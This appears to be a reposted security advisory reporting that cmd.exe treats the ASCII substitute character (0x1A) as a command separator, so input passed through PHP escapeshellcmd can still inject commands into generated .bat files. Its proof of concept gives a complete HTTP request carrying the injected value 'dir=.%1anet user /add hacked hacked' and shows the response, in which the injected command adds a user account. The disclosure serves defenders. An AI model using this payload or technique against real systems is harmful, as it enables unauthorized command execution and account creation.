Unexpected behavior of cmd.exe while processing .bat files leads to potential command injection vulnerabilities Tested on: Windows 7, Windows 10 Author: Julian Horoszkiewicz It was discovered that cmd.exe, when processing .bat files, treats the ASCII substitute character (code 26) as a command separator (like & or |). This opens the way for unexpected command injection vulnerabilities in applications which generate .bat files based on user input, as this character is not filtered by most application input sanitisers against command injection. PoC: Let's assume the following PHP script (note the use of well known escapeshellcmd() function, known as a safe way to sanitise user input before using it as a command argument): Let's send a request containing "." as a parameter to the hardcoded "dir" command, appended with another command - taking advantage of %1a as a command separator: POST /escape_shell_cmd.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: pl,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 35 dir=.%1anet user /add hacked hacked The response: HTTP/1.1 200 OK Server: Apache X-Powered-By: PHP Content-Length: 977 Connection: close Content-Type: text/html; charset=UTF-8 C:\wamp64\www>dir . Volume in drive C has no label. Volume Serial Number is 22C1-AD4C Directory of C:\wamp64\www 24.07.2016 17:22
. 24.07.2016 17:22
.. [...] C:\wamp64\www>net user /add hacked hacked Command executed successfully. To double check, we look the new user up in the command line once again: C:\Users\win>net user hacked User name hacked Full name [...] So, it seems that every piece of software generating .bat files from user input is potentially vulnerable - it does not pertain to PHP and escapeshellcmd specifically, but rather to cmd.exe itself. More on alternative command injection payloads: http://ift.tt/2f6s4y6
Source: Gmail -> IFTTT-> Blogger
No comments:
Post a Comment